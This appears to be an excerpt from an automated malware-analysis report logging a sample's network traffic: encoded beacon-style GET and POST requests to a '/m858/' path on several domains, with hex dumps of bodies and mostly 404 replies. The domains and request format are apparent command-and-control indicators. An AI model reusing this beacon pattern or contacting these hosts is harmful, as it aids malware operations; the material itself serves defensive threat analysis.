            Source: global trafficHTTP traffic detected: GET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=unslu3ANnB0jwEgO8dBJ1wGsM1BVB71C8A+lB2lk4lRhZ2GNTPRbQ9k43BlJiddJ5udbRNs+X5XglvYJR+tWoycotxYusBU4lA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.hillcresthealth.onlineConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=vUVAFHoFovduHd4/DKwXed3af3ePb0vry6dcW+l5/zrb0ZZNrBa0Shr1AhFt6JSAxzoXU5EndMSNZsLwoEVPEHAIn6yNHix56w== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.hmoatl.comConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: unknownDNS traffic detected: queries for: www.ozzventures.shop
            Source: unknownHTTP traffic detected: POST /m858/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.fortunetravelsltd.comOrigin: http://www.fortunetravelsltd.comReferer: http://www.fortunetravelsltd.com/m858/Content-Length: 186Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+Data Raw: 6e 52 52 70 53 3d 55 52 4f 52 55 4c 4f 6c 58 72 42 39 6a 44 74 37 6c 43 65 47 53 4e 67 31 77 31 6f 31 45 52 32 79 39 50 4a 46 4f 55 68 72 41 75 6c 71 69 71 37 71 70 51 4d 58 67 56 32 37 6d 69 31 44 32 61 7a 35 59 77 4b 57 64 66 4e 72 75 75 69 50 68 36 4a 42 35 4e 50 43 42 4d 51 77 50 31 65 76 6a 61 53 53 6a 73 42 32 6f 48 55 78 43 54 32 6a 36 4f 5a 4f 43 65 76 59 2b 77 62 78 2b 2b 47 66 47 69 59 2f 4c 64 46 77 48 45 5a 42 50 38 54 30 34 4b 4f 78 79 36 54 44 51 53 4b 45 38 6c 71 33 41 46 32 74 59 69 72 32 4a 61 2f 35 48 2f 45 30 4f 68 58 4e 45 51 3d 3d Data Ascii: nRRpS=URORULOlXrB9jDt7lCeGSNg1w1o1ER2y9PJFOUhrAulqiq7qpQMXgV27mi1D2az5YwKWdfNruuiPh6JB5NPCBMQwP1evjaSSjsB2oHUxCT2j6OZOCevY+wbx++GfGiY/LdFwHEZBP8T04KOxy6TDQSKE8lq3AF2tYir2Ja/5H/E0OhXNEQ==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://fortunetravelsltd.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 07 Dec 2023 12:42:43 GMTserver: LiteSpeedreferrer-policy: no-referrer-when-downgradeData Raw: 37 66 37 0d 0a e0 9b 02 80 fc ad e5 7f bf 4e 36 2b 2a 56 b7 49 15 27 02 a2 51 ef d0 f3 f0 87 3d c2 51 a9 a0 58 80 19 de e0 ff 77 ef bf 68 1f f4 03 45 ac 2e 8f 86 ce dc b9 bf 55 4a ed d6 da cc d9 a7 a4 f6 66 d1 18 94 52 3d 1a 81 a7 31 0b 00 c6 86 38 73 0f 87 86 32 5e b2 4e 52 04 1c cd fb fe 75 4a b3 5b c4 f0 66 ea a6 8c 82 29 cd 0e 16 67 3b 2c dc ad 41 f2 ad b8 6c db cd 61 f5 d1 26 eb 17 48 7e f5 d1 ef 02 17 f8 df 7f 0e 64 0d 38 d8 c7 db c1 8f 1d 99 52 5a bb a2 f0 e3 7a 9e b1 58 62 46 86 fe 6a f3 62 e8 b3 bf ac 98 9f 5d 21 02 d5 79 eb 09 97 f4 76 f8 e5 87 37 34 23 1e 48 41 1c ff 7a 65 29 f0 df a0 41 b6 38 cc 96 06 68 0e 48 13 2d 6a c6 b7 c3 3c 48 b9 c6 7f 10 3f c7 9b 55 17 a3 e4 7f d8 cf 00 51 2b 87 6f 5c a2 57 49 36 39 7c ff 5b 8d 48 16 9f c8 71 78 fd 15 5f 66 8d e0 fc 85 fc f8 d7 bf ff fd df 9f 3f 90 ff fe fb cd ff 7f f8 fd 3f e4 f7 ff 7e bf 40 db 0d f7 bb dd ee 35 a6 a7 c3 f7 dd 9b fa fd 87 37 1b 7c 98 b3 98 ac be 3e dd fe 90 30 f8 30 13 bb ac 5b ea 3a 98 fd 07 58 9d d2 38 79 67 30 7c 24 6d da cd 87 f1 e5 8f f2 47 f9 e3 cb 77 56 ca 67 02 dc 1e e1 53 25 fa c2 db dd 9c 84 77 ec af 36 3d 1b 88 5d 01 80 67 4c f8 48 2a a0 ba 5f f4 e4 9a 75 96 0e b9 f3 b5 88 09 8a 8f 24 48 67 c9 83 ef 7d 8a f9 a4 b8 59 3e ab 07 d8 59 8d 08 6b 11 ac 8e f7 6e 27 2e 3f 49 4e 8a f7 fd ab b3 cb 95 04 74 6f b9 59 22 9c ea 00 5b 49 7a ca d7 2e f9 51 28 8a c1 87 b4 2d 98 82 ba a1 8b 2e 99 b3 f6 33 f9 87 68 8b 78 1e fc 92 d4 1d a3 9f f1 e6 e8 e2 f9 7e f6 61 24 98 8f 43 02 3b 5a ad 92 f5 4b 91 c8 d0 84 6a 26 cb 24 ee 8b fc 88 68 7e 04 ba 3c b1 d3 f5 5f 59 0c 88 a6 38 c8 d2 e7 3b 3f c7 83 95 50 31 8b a7 d2 51 fc cd cf 6b 6a cf 90 65 9a f6 bb af 90 41 3f 65 b1 ad ce 2b 13 0b c1 04 2b 58 5b a4 74 5a 11 04 a3 53 24 f5 2d 1e 80 4e fc c3 bb fe bb dd 6e a5 91 cf f8 a3 0f c4 fe 3d f9 05 c9 bf 98 ec a2 c8 aa b6 7d 09 40 22 4b 5d 7a 83 75 75 08 c9 6f 7a 02 fd 88 46 fb 01 e3 db 81 37 ec c1 1b 26 fe c4 df a9 35 6d 01 8b ab d9 0e 12 cf b1 b7 59 7d 9e 5a 1f 38 4e 88 29 27 d6 bc e5 f7 f5 83 f7 33 44 af ad 72 d2 4d 13 a1 77 5e 5f 21 09 4f 00 3a c6 9c 04 ba 89 69 63 b5 91 03 c7 85 56 87 42 ff 04 b6 f5 05 a7 b1 85 b1 31 cd ef 79 81 38 f7 3d eb 18 bf ba 61 78 93 67 71 e6 32 f7 4e 7d be 09 23 e9 b2 dd 09 dd 6a ae 9c 9b 70 bc b2 0d 5a b7 4b 3b c2 0d 17 e3 43 54 b2 cf dd fb 30 1d 1e 34 16 05 6d f6 8d 82 6b 53 b1 2c c9 fc 14 52 94 7a fe 07 f0 ba 6a 2f b5 ac ab 8b ae 7f 67 d4 71 3e a2 6e 5d 58 12 35 05 e7 78 a3 f3 bd 72 70 4b 46 58 28 9a e8 38 fb 3c de fb be f7 e6 f9 11 e0 be 02 ec 58 4a 9f 04 b0 85 5a 1c 60 b7 67 87 74 24 63 6f e6 fd 32 ee db a1 9f 6a 81 de 6d 36 4e 30 06 f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://fortunetravelsltd.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 07 Dec 2023 12:42:48 GMTserver: LiteSpeedreferrer-policy: no-referrer-when-downgradeData Raw: 37 66 37 0d 0a e0 9b 02 80 fc ad e5 7f bf 4e 36 2b 2a 56 b7 49 15 27 02 a2 51 ef d0 f3 f0 87 3d c2 51 a9 a0 58 80 19 de e0 ff 77 ef bf 68 1f f4 03 45 ac 2e 8f 86 ce dc b9 bf 55 4a ed d6 da cc d9 a7 a4 f6 66 d1 18 94 52 3d 1a 81 a7 31 0b 00 c6 86 38 73 0f 87 86 32 5e b2 4e 52 04 1c cd fb fe 75 4a b3 5b c4 f0 66 ea a6 8c 82 29 cd 0e 16 67 3b 2c dc ad 41 f2 ad b8 6c db cd 61 f5 d1 26 eb 17 48 7e f5 d1 ef 02 17 f8 df 7f 0e 64 0d 38 d8 c7 db c1 8f 1d 99 52 5a bb a2 f0 e3 7a 9e b1 58 62 46 86 fe 6a f3 62 e8 b3 bf ac 98 9f 5d 21 02 d5 79 eb 09 97 f4 76 f8 e5 87 37 34 23 1e 48 41 1c ff 7a 65 29 f0 df a0 41 b6 38 cc 96 06 68 0e 48 13 2d 6a c6 b7 c3 3c 48 b9 c6 7f 10 3f c7 9b 55 17 a3 e4 7f d8 cf 00 51 2b 87 6f 5c a2 57 49 36 39 7c ff 5b 8d 48 16 9f c8 71 78 fd 15 5f 66 8d e0 fc 85 fc f8 d7 bf ff fd df 9f 3f 90 ff fe fb cd ff 7f f8 fd 3f e4 f7 ff 7e bf 40 db 0d f7 bb dd ee 35 a6 a7 c3 f7 dd 9b fa fd 87 37 1b 7c 98 b3 98 ac be 3e dd fe 90 30 f8 30 13 bb ac 5b ea 3a 98 fd 07 58 9d d2 38 79 67 30 7c 24 6d da cd 87 f1 e5 8f f2 47 f9 e3 cb 77 56 ca 67 02 dc 1e e1 53 25 fa c2 db dd 9c 84 77 ec af 36 3d 1b 88 5d 01 80 67 4c f8 48 2a a0 ba 5f f4 e4 9a 75 96 0e b9 f3 b5 88 09 8a 8f 24 48 67 c9 83 ef 7d 8a f9 a4 b8 59 3e ab 07 d8 59 8d 08 6b 11 ac 8e f7 6e 27 2e 3f 49 4e 8a f7 fd ab b3 cb 95 04 74 6f b9 59 22 9c ea 00 5b 49 7a ca d7 2e f9 51 28 8a c1 87 b4 2d 98 82 ba a1 8b 2e 99 b3 f6 33 f9 87 68 8b 78 1e fc 92 d4 1d a3 9f f1 e6 e8 e2 f9 7e f6 61 24 98 8f 43 02 3b 5a ad 92 f5 4b 91 c8 d0 84 6a 26 cb 24 ee 8b fc 88 68 7e 04 ba 3c b1 d3 f5 5f 59 0c 88 a6 38 c8 d2 e7 3b 3f c7 83 95 50 31 8b a7 d2 51 fc cd cf 6b 6a cf 90 65 9a f6 bb af 90 41 3f 65 b1 ad ce 2b 13 0b c1 04 2b 58 5b a4 74 5a 11 04 a3 53 24 f5 2d 1e 80 4e fc c3 bb fe bb dd 6e a5 91 cf f8 a3 0f c4 fe 3d f9 05 c9 bf 98 ec a2 c8 aa b6 7d 09 40 22 4b 5d 7a 83 75 75 08 c9 6f 7a 02 fd 88 46 fb 01 e3 db 81 37 ec c1 1b 26 fe c4 df a9 35 6d 01 8b ab d9 0e 12 cf b1 b7 59 7d 9e 5a 1f 38 4e 88 29 27 d6 bc e5 f7 f5 83 f7 33 44 af ad 72 d2 4d 13 a1 77 5e 5f 21 09 4f 00 3a c6 9c 04 ba 89 69 63 b5 91 03 c7 85 56 87 42 ff 04 b6 f5 05 a7 b1 85 b1 31 cd ef 79 81 38 f7 3d eb 18 bf ba 61 78 93 67 71 e6 32 f7 4e 7d be 09 23 e9 b2 dd 09 dd 6a ae 9c 9b 70 bc b2 0d 5a b7 4b 3b c2 0d 17 e3 43 54 b2 cf dd fb 30 1d 1e 34 16 05 6d f6 8d 82 6b 53 b1 2c c9 fc 14 52 94 7a fe 07 f0 ba 6a 2f b5 ac ab 8b ae 7f 67 d4 71 3e a2 6e 5d 58 12 35 05 e7 78 a3 f3 bd 72 70 4b 46 58 28 9a e8 38 fb 3c de fb be f7 e6 f9 11 e0 be 02 ec 58 4a 9f 04 b0 85 5a 1c 60 b7 67 87 74 24 63 6f e6 fd 32 ee db a1 9f 6a 81 de 6d 36 4e 30 06 f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://fortunetravelsltd.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 07 Dec 2023 12:42:51 GMTserver: LiteSpeedreferrer-policy: no-referrer-when-downgradeData Raw: 37 66 37 0d 0a e0 9b 02 80 fc ad e5 7f bf 4e 36 2b 2a 56 b7 49 15 27 02 a2 51 ef d0 f3 f0 87 3d c2 51 a9 a0 58 80 19 de e0 ff 77 ef bf 68 1f f4 03 45 ac 2e 8f 86 ce dc b9 bf 55 4a ed d6 da cc d9 a7 a4 f6 66 d1 18 94 52 3d 1a 81 a7 31 0b 00 c6 86 38 73 0f 87 86 32 5e b2 4e 52 04 1c cd fb fe 75 4a b3 5b c4 f0 66 ea a6 8c 82 29 cd 0e 16 67 3b 2c dc ad 41 f2 ad b8 6c db cd 61 f5 d1 26 eb 17 48 7e f5 d1 ef 02 17 f8 df 7f 0e 64 0d 38 d8 c7 db c1 8f 1d 99 52 5a bb a2 f0 e3 7a 9e b1 58 62 46 86 fe 6a f3 62 e8 b3 bf ac 98 9f 5d 21 02 d5 79 eb 09 97 f4 76 f8 e5 87 37 34 23 1e 48 41 1c ff 7a 65 29 f0 df a0 41 b6 38 cc 96 06 68 0e 48 13 2d 6a c6 b7 c3 3c 48 b9 c6 7f 10 3f c7 9b 55 17 a3 e4 7f d8 cf 00 51 2b 87 6f 5c a2 57 49 36 39 7c ff 5b 8d 48 16 9f c8 71 78 fd 15 5f 66 8d e0 fc 85 fc f8 d7 bf ff fd df 9f 3f 90 ff fe fb cd ff 7f f8 fd 3f e4 f7 ff 7e bf 40 db 0d f7 bb dd ee 35 a6 a7 c3 f7 dd 9b fa fd 87 37 1b 7c 98 b3 98 ac be 3e dd fe 90 30 f8 30 13 bb ac 5b ea 3a 98 fd 07 58 9d d2 38 79 67 30 7c 24 6d da cd 87 f1 e5 8f f2 47 f9 e3 cb 77 56 ca 67 02 dc 1e e1 53 25 fa c2 db dd 9c 84 77 ec af 36 3d 1b 88 5d 01 80 67 4c f8 48 2a a0 ba 5f f4 e4 9a 75 96 0e b9 f3 b5 88 09 8a 8f 24 48 67 c9 83 ef 7d 8a f9 a4 b8 59 3e ab 07 d8 59 8d 08 6b 11 ac 8e f7 6e 27 2e 3f 49 4e 8a f7 fd ab b3 cb 95 04 74 6f b9 59 22 9c ea 00 5b 49 7a ca d7 2e f9 51 28 8a c1 87 b4 2d 98 82 ba a1 8b 2e 99 b3 f6 33 f9 87 68 8b 78 1e fc 92 d4 1d a3 9f f1 e6 e8 e2 f9 7e f6 61 24 98 8f 43 02 3b 5a ad 92 f5 4b 91 c8 d0 84 6a 26 cb 24 ee 8b fc 88 68 7e 04 ba 3c b1 d3 f5 5f 59 0c 88 a6 38 c8 d2 e7 3b 3f c7 83 95 50 31 8b a7 d2 51 fc cd cf 6b 6a cf 90 65 9a f6 bb af 90 41 3f 65 b1 ad ce 2b 13 0b c1 04 2b 58 5b a4 74 5a 11 04 a3 53 24 f5 2d 1e 80 4e fc c3 bb fe bb dd 6e a5 91 cf f8 a3 0f c4 fe 3d f9 05 c9 bf 98 ec a2 c8 aa b6 7d 09 40 22 4b 5d 7a 83 75 75 08 c9 6f 7a 02 fd 88 46 fb 01 e3 db 81 37 ec c1 1b 26 fe c4 df a9 35 6d 01 8b ab d9 0e 12 cf b1 b7 59 7d 9e 5a 1f 38 4e 88 29 27 d6 bc e5 f7 f5 83 f7 33 44 af ad 72 d2 4d 13 a1 77 5e 5f 21 09 4f 00 3a c6 9c 04 ba 89 69 63 b5 91 03 c7 85 56 87 42 ff 04 b6 f5 05 a7 b1 85 b1 31 cd ef 79 81 38 f7 3d eb 18 bf ba 61 78 93 67 71 e6 32 f7 4e 7d be 09 23 e9 b2 dd 09 dd 6a ae 9c 9b 70 bc b2 0d 5a b7 4b 3b c2 0d 17 e3 43 54 b2 cf dd fb 30 1d 1e 34 16 05 6d f6 8d 82 6b 53 b1 2c c9 fc 14 52 94 7a fe 07 f0 ba 6a 2f b5 ac ab 8b ae 7f 67 d4 71 3e a2 6e 5d 58 12 35 05 e7 78 a3 f3 bd 72 70 4b 46 58 28 9a e8 38 fb 3c de fb be f7 e6 f9 11 e0 be 02 ec 58 4a 9f 04 b0 85 5a 1c 60 b7 67 87 74 24 63 6f e6 fd 32 ee db a1 9f 6a 81 de 6d 36 4e 30 06 f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 12:42:59 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://porousworld.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a Data Ascii: 3b<!DOCTYPE html><html lang="en-US"><head><meta charset="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 12:43:02 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://porousworld.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a Data Ascii: 16<!DOCTYPE html><html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 12:43:05 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://porousworld.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a Data Ascii: 3b<!DOCTYPE html><html lang="en-US"><head><meta charset="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 12:43:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 12:43:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 12:43:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 12:43:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Dec 2023 12:43:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 